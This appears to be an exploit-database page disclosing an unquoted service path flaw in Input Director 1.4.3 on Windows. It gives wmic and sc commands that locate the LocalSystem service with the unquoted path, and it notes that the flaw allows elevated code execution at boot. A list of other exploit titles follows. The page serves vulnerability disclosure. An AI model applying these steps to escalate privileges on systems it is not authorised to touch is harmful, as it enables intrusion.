Search for hundreds of thousands of exploits

"Input Director 1.4.3 - 'Input Director' Unquoted Service Path"

Author

Exploit author

"TOUHAMI Kasbaoui"

Platform

Exploit platform

windows

Release date

Exploit published date

2020-09-09

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
# Exploit Title: Input Director 1.4.3 - 'Input Director' Unquoted Service Path
# Discovery Date: 2020-09-08
# Response from Input Director Support: 09/09/2020
# Exploit Author: TOUHAMI Kasbaoui
# Vendor Homepage: https://www.inputdirector.com/
# Version: 1.4.3
# Tested on: Windows Server 2012, Windows 10

# Find the Unquoted Service Path Vulnerability:

C:\wmic service get name,displayname,pathname,startmode | findstr /i "auto"
| findstr /i /v "c:\windows\\" | findstr /i /v """

Input Director Service  InputDirector  C:\Program Files
(x86)\InputDirector\IDWinService.exe Auto

# Service info:

C:\sc qc IDWinService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: InputDirector
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Input
Director\IDWinService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Input Director Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

# Exploit:

A successful attempt to exploit this vulnerability could allow executing
code during startup or reboot with the elevated privileges.
Release Date Title Type Platform Author
2020-09-21 "ForensiTAppxService 2.2.0.4 - 'ForensiTAppxService.exe' Unquoted Service Path" local windows "Burhanettin Ozgenc"
2020-09-21 "B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution" webapps multiple LiquidWorm
2020-09-21 "Mida eFramework 2.9.0 - Back Door Access" webapps hardware elbae
2020-09-21 "BlackCat CMS 1.3.6 - Cross-Site Request Forgery" webapps php Noth
2020-09-21 "Seat Reservation System 1.0 - 'id' SQL Injection" webapps php Augkim
2020-09-21 "Online Shop Project 1.0 - 'p' SQL Injection" webapps php Augkim
2020-09-18 "Mantis Bug Tracker 2.3.0 - Remote Code Execution (Unauthenticated)" webapps php "Nikolas Geiselman"
2020-09-18 "SpamTitan 7.07 - Remote Code Execution (Authenticated)" webapps multiple "Felipe Molina"
2020-09-17 "Microsoft SQL Server Reporting Services 2016 - Remote Code Execution" remote windows "West Shepherd"
2020-09-16 "Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software" local windows hyp3rlinx
Release Date Title Type Platform Author
2020-09-09 "Input Director 1.4.3 - 'Input Director' Unquoted Service Path" local windows "TOUHAMI Kasbaoui"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48795/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.